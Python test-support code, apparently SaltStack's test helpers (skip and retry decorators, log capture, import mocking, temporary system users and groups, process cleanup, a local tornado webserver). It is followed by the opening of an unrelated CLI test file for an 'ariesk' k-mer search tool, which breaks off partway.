if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
self.skipTest('Destructive tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
cls.skipTest('Destructive tests are disabled')
return caller(cls)
return wrap
def expensiveTest(caller):
'''
Mark a test case as an expensive test, for example, a test which can cost
money(Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
self.skipTest('Expensive tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
cls.skipTest('Expensive tests are disabled')
return caller(cls)
return wrap
def flaky(caller=None, condition=True):
'''
Mark a test as flaky. The test will attempt to run five times,
looking for a successful run. After an immediate second try,
it will use an exponential backoff starting with one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
'''
if caller is None:
return functools.partial(flaky, condition=condition)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith('test_')]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(caller, attrname, flaky(caller=function, condition=condition))
except Exception as exc:
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, 4):
try:
return caller(cls)
except Exception as exc:
if attempt == 4:
raise exc
backoff_time = attempt ** 2
log.info('Found Exception. Waiting %s seconds to retry.', backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
'''
Mark a test as requiring the tests SSH daemon running.
.. code-block:: python
class MyTestCase(TestCase):
@requiresSshdServer
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
self.skipTest('SSH tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
cls.skipTest('SSH tests are disabled')
return caller(cls)
return wrap
class RedirectStdStreams(object):
'''
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
'''
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils.files
if stdout is None:
stdout = salt.utils.files.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
if stderr is None:
stderr = salt.utils.files.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception:
pass
try:
self.__stderr.flush()
except Exception:
pass
class TestsLoggingHandler(object):
'''
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TestsLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
'''
def __init__(self, level=0, format='%(levelname)s:%(message)s'):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
def relative_import(import_name, relative_from='../'):
'''
Update sys.path to include `relative_from` before importing `import_name`
'''
try:
return __import__(import_name)
except ImportError:
previous_frame = inspect.getframeinfo(inspect.currentframe().f_back)
sys.path.insert(
0, os.path.realpath(
os.path.join(
os.path.abspath(
os.path.dirname(previous_frame.filename)
),
relative_from
)
)
)
return __import__(import_name)
class ForceImportErrorOn(object):
'''
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
'''
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, '__import__', self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_funtion(self):
self.patcher.stop()
def __fake_import__(self,
name,
globals_={} if six.PY2 else None,
locals_={} if six.PY2 else None,
fromlist=[] if six.PY2 else (),
level=-1 if six.PY2 else 0):
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError(
'Forced ImportError raised for {0!r}'.format(name)
)
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
'Forced ImportError raised for {0!r}'.format(
'from {0} import {1}'.format(
name, ', '.join(fromlist)
)
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_funtion()
class MockWraps(object):
'''
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
'''
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
'''
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
'''
def decorator(func):
@functools.wraps(func)
def wrapper(cls):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(('', 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(('', 18001))
retsock.close()
has_local_network = True
except socket.error:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
pubsock.bind(('', 18000))
pubsock.close()
retsock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
retsock.bind(('', 18001))
retsock.close()
has_local_network = True
except socket.error:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest('No local network was detected')
return func(cls)
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in ('173.194.41.198', '173.194.41.199', '173.194.41.200',
'173.194.41.201', '173.194.41.206', '173.194.41.192',
'173.194.41.193', '173.194.41.194', '173.194.41.195',
'173.194.41.196', '173.194.41.197'):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except socket.error:
# Let's check the next IP
continue
else:
cls.skipTest('No internet network connection was detected')
finally:
sock.close()
return func(cls)
return wrapper
return decorator
def with_system_user(username, on_existing='delete', delete=True):
'''
Create and optionally destroy a system user to be used within a test
case. The system user is crated using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system user {0!r}'.format(username))
create_user = cls.run_function('user.add', [username])
if not create_user:
log.debug('Failed to create system user')
# The user was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system user {0!r}'.format(
username
)
)
if on_existing == 'delete':
log.debug(
'Deleting the system user {0!r}'.format(
username
)
)
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
cls.skipTest(
'A user named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(username)
)
log.debug(
'Second time creating system user {0!r}'.format(
username
)
)
create_user = cls.run_function('user.add', [username])
if not create_user:
cls.skipTest(
'A user named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(username)
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system user {0!r} '
'afterwards did.'.format(username)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system user {0!r}'.format(username)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_group(group, on_existing='delete', delete=True):
'''
Create and optionally destroy a system group to be used within a test
case. The system user is crated using the ``group`` salt module.
The decorated testcase function must accept 'group' as an argument.
:param group: The desired group name for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system group {0!r}'.format(group))
create_group = cls.run_function('group.add', [group])
if not create_group:
log.debug('Failed to create system group')
# The group was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system group {0!r}'.format(group)
)
if on_existing == 'delete':
log.debug(
'Deleting the system group {0!r}'.format(group)
)
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
cls.skipTest(
'A group named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(group)
)
log.debug(
'Second time creating system group {0!r}'.format(
group
)
)
create_group = cls.run_function('group.add', [group])
if not create_group:
cls.skipTest(
'A group named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(group)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system group {0!r} '
'afterwards did.'.format(group)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system group {0!r}'.format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group,
on_existing='delete', delete=True):
'''
Create and optionally destroy a system user and group to be used within a
test case. The system user is crated using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system user {0!r}'.format(username))
create_user = cls.run_function('user.add', [username])
log.debug('Creating system group {0!r}'.format(group))
create_group = cls.run_function('group.add', [group])
if not create_user:
log.debug('Failed to create system user')
# The user was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system user {0!r}'.format(
username
)
)
if on_existing == 'delete':
log.debug(
'Deleting the system user {0!r}'.format(
username
)
)
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
cls.skipTest(
'A user named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(username)
)
log.debug(
'Second time creating system user {0!r}'.format(
username
)
)
create_user = cls.run_function('user.add', [username])
if not create_user:
cls.skipTest(
'A user named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(username)
)
if not create_group:
log.debug('Failed to create system group')
# The group was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system group {0!r}'.format(group)
)
if on_existing == 'delete':
log.debug(
'Deleting the system group {0!r}'.format(group)
)
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
cls.skipTest(
'A group named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(group)
)
log.debug(
'Second time creating system group {0!r}'.format(
group
)
)
create_group = cls.run_function('group.add', [group])
if not create_group:
cls.skipTest(
'A group named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(group)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
delete_group = cls.run_function('group.delete', [group])
if not delete_user:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system user {0!r} '
'afterwards did.'.format(username)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system user {0!r}'.format(username)
)
if not delete_group:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system group {0!r} '
'afterwards did.'.format(group)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system group {0!r}'.format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def requires_system_grains(func):
'''
Function decorator which loads and passes the system's grains to the test
case.
'''
@functools.wraps(func)
def decorator(cls):
if not hasattr(cls, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which is '
'necessary to collect the system grains'.format(
cls.__class__.__name__
)
)
return func(cls, grains=cls.run_function('grains.items'))
return decorator
def requires_salt_modules(*names):
'''
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
'''
def decorator(caller):
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if old_setup is not None:
old_setup(self, *args, **kwargs)
if not hasattr(self, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which '
'is necessary to collect the loaded modules'.format(
self.__class__.__name__
)
)
not_found_modules = self.run_function('runtests_helpers.modules_available', names)
if not_found_modules:
if len(not_found_modules) == 1:
self.skipTest('Salt module {0!r} is not available'.format(not_found_modules[0]))
self.skipTest('Salt modules not available: {0!r}'.format(not_found_modules))
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrapper(cls):
if not hasattr(cls, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which is '
'necessary to collect the loaded modules'.format(
cls.__class__.__name__
)
)
for name in names:
if name not in cls.run_function('sys.doc'):
cls.skipTest(
'Salt module {0!r} is not available'.format(name)
)
break
return caller(cls)
return wrapper
return decorator
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop('check_all', False)
message = kwargs.pop('message', None)
if kwargs:
raise RuntimeError(
'The only supported keyword argument is \'check_all\' and '
'\'message\'. Invalid keyword arguments: {0}'.format(
', '.join(kwargs.keys())
)
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
'{0}The {1!r} binary was not found'.format(
message and '{0}. '.format(message) or '',
binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
'{0}None of the following binaries was found: {1}'.format(
message and '{0}. '.format(message) or '',
', '.join(binaries)
)
)
return _id
def skip_if_not_root(func):
if not sys.platform.startswith('win'):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as root to run this test'
else:
import salt.utils.win_functions
current_user = salt.utils.win_functions.get_current_user()
if current_user != 'SYSTEM':
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as an Administrator to run this test'
return func
if sys.platform.startswith('win'):
SIGTERM = signal.CTRL_BREAK_EVENT # pylint: disable=no-member
else:
SIGTERM = signal.SIGTERM
def collect_child_processes(pid):
'''
Try to collect any started child processes of the provided pid
'''
# Let's get the child processes of the started subprocess
try:
parent = psutil.Process(pid)
if hasattr(parent, 'children'):
children = parent.children(recursive=True)
else:
children = []
except psutil.NoSuchProcess:
children = []
return children[::-1] # return a reversed list of the children
def _terminate_process_list(process_list, kill=False, slow_stop=False):
for process in process_list[:][::-1]: # Iterate over a reversed copy of the list
if not psutil.pid_exists(process.pid):
process_list.remove(process)
continue
try:
if not kill and process.status() == psutil.STATUS_ZOMBIE:
# Zombie processes will exit once child processes also exit
continue
try:
cmdline = process.cmdline()
except psutil.AccessDenied:
# OSX is more restrictive about the above information
cmdline = None
if not cmdline:
try:
cmdline = process.as_dict()
except Exception:
cmdline = 'UNKNOWN PROCESS'
if kill:
log.info('Killing process(%s): %s', process.pid, cmdline)
process.kill()
else:
log.info('Terminating process(%s): %s', process.pid, cmdline)
try:
if slow_stop:
# Allow coverage data to be written down to disk
process.send_signal(SIGTERM)
try:
process.wait(2)
except psutil.TimeoutExpired:
if psutil.pid_exists(process.pid):
continue
else:
process.terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not psutil.pid_exists(process.pid):
process_list.remove(process)
except psutil.NoSuchProcess:
process_list.remove(process)
def terminate_process_list(process_list, kill=False, slow_stop=False):
def on_process_terminated(proc):
log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
# Try to terminate processes with the provided kill and slow_stop parameters
log.info('Terminating process list. 1st step. kill: %s, slow stop: %s', kill, slow_stop)
# Cache the cmdline since that will be inaccessible once the process is terminated
for proc in process_list:
try:
cmdline = proc.cmdline()
except (psutil.NoSuchProcess, psutil.AccessDenied):
# OSX is more restrictive about the above information
cmdline = None
if not cmdline:
try:
cmdline = proc
except (psutil.NoSuchProcess, psutil.AccessDenied):
cmdline = '<could not be retrived; dead process: {0}>'.format(proc)
proc._cmdline = cmdline
_terminate_process_list(process_list, kill=kill, slow_stop=slow_stop)
psutil.wait_procs(process_list, timeout=15, callback=on_process_terminated)
if process_list:
# If there's still processes to be terminated, retry and kill them if slow_stop is False
log.info('Terminating process list. 2nd step. kill: %s, slow stop: %s', slow_stop is False, slow_stop)
_terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
psutil.wait_procs(process_list, timeout=10, callback=on_process_terminated)
if process_list:
# If there's still processes to be terminated, just kill them, no slow stopping now
log.info('Terminating process list. 3rd step. kill: True, slow stop: False')
_terminate_process_list(process_list, kill=True, slow_stop=False)
psutil.wait_procs(process_list, timeout=5, callback=on_process_terminated)
if process_list:
# In there's still processes to be terminated, log a warning about it
log.warning('Some processes failed to properly terminate: %s', process_list)
def terminate_process(pid=None, process=None, children=None, kill_children=False, slow_stop=False):
'''
Try to terminate/kill the started processe
'''
children = children or []
process_list = []
def on_process_terminated(proc):
if proc.returncode:
log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
else:
log.info('Process %s terminated', getattr(proc, '_cmdline', proc))
if pid and not process:
try:
process = psutil.Process(pid)
process_list.append(process)
except psutil.NoSuchProcess:
# Process is already gone
process = None
if kill_children:
if process:
if not children:
children = collect_child_processes(process.pid)
else:
# Let's collect children again since there might be new ones
children.extend(collect_child_processes(pid))
if children:
process_list.extend(children)
if process_list:
if process:
log.info('Stopping process %s and respective children: %s', process, children)
else:
log.info('Terminating process list: %s', process_list)
terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
if process and psutil.pid_exists(process.pid):
log.warning('Process left behind which we were unable to kill: %s', process)
def terminate_process_pid(pid, only_children=False):
children = []
process = None
# Let's begin the shutdown routines
try:
process = psutil.Process(pid)
children = collect_child_processes(pid)
except psutil.NoSuchProcess:
log.info('No process with the PID %s was found running', pid)
if only_children:
return terminate_process(children=children, kill_children=True, slow_stop=True)
return terminate_process(pid=pid, process=process, children=children, kill_children=True, slow_stop=True)
def repeat(caller=None, condition=True, times=5):
'''
Repeat a test X amount of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
'''
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith('test_')]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(caller, attrname, repeat(caller=function, condition=condition, times=times))
except Exception as exc:
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
result = None
for attempt in range(1, times+1):
log.info('%s test run %d of %s times', cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
'''
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(tornado.web.RequestHandler):
pass
'''
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get('Authorization')
if auth is None or not auth.startswith('Basic '):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header(
'WWW-Authenticate', 'Basic realm=Restricted')
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = \
base64.b64decode(auth[6:]).split(':', 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
'''
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: Oxygen
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
'''
return prefix + ''.join(
random.choice(string.ascii_uppercase + string.digits)
for x in range(size)
)
class Webserver(object):
'''
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
'''
def __init__(self,
root=None,
port=None,
wait=5,
handler=None):
'''
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
'''
if port is not None and not isinstance(port, six.integer_types):
raise ValueError('port must be an integer')
if root is None:
root = os.path.join(FILES, 'file', 'base')
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError('root must be a string')
self.port = port
self.wait = wait
self.handler = handler \
if handler is not None \
else tornado.web.StaticFileHandler
self.web_root = None
def target(self):
'''
Threading target which stands up the tornado application
'''
self.ioloop = tornado.ioloop.IOLoop()
self.ioloop.make_current()
self.application = tornado.web.Application(
[(r'/(.*)', self.handler, {'path': self.root})])
self.application.listen(self.port)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(('127.0.0.1', self.port)) == 0
def url(self, path):
'''
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
'''
if self.web_root is None:
raise RuntimeError('Webserver instance has not been started')
err_msg = 'invalid path, must be either a relative path or a path ' \
'within {0}'.format(self.root)
try:
relpath = path \
if not os.path.isabs(path) \
else os.path.relpath(path, self.root)
if relpath.startswith('..' + os.sep):
raise ValueError(err_msg)
return '/'.join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
'''
Starts the webserver
'''
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = 'http://127.0.0.1:{0}'.format(self.port)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
'Failed to start tornado webserver on 127.0.0.1:{0} within '
'{1} seconds'.format(self.port, self.wait)
)
def stop(self):
'''
Stops the webserver
'''
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
|
_test_cli_main.py
|
from kthread import KThread
from os.path import join, dirname, abspath
from os import remove
from unittest import TestCase
from click.testing import CliRunner
from ariesk.cli import main
from ariesk.search_server import (
SearchServer,
SearchClient,
)
GRID_COVER = abspath(join(dirname(__file__), 'small_grid_cover.sqlite'))
KMER_TABLE = abspath(join(dirname(__file__), 'small_31mer_table.csv'))
KMER_ROTATION = abspath(join(dirname(__file__), '../data/rotation_minikraken.json'))
PORT = 5431
KMER_31 = 'AATACGTCCGGAGTATCGACGCACACATGGT'
def run_server():
SearchServer.from_filepath(PORT, GRID_COVER, auto_start=True)
class TestMainCli(TestCase):
'''
def test_search_server_cli(self):
runner = CliRunner()
server_thread = KThread(target=run_server)
try:
server_thread.start()
results = runner.invoke(
main,
['search', 'seq', f'-p {PORT}', '--search-mode=full', '-r 0', '-i 0.1', KMER_31]
)
self.assertIn(KMER_31, results.output)
runner.invoke(main, ['shutdown-server', f'-p {PORT}'])
finally:
if server_thread.is_alive():
server_thread.terminate()
'''
'''
def test_search_file_server_cli(self):
runner = CliRunner()
server_thread = KThread(target=run_server)
with runner.isolated_filesystem():
outfile = 'temp.test_file_search.csv'
try:
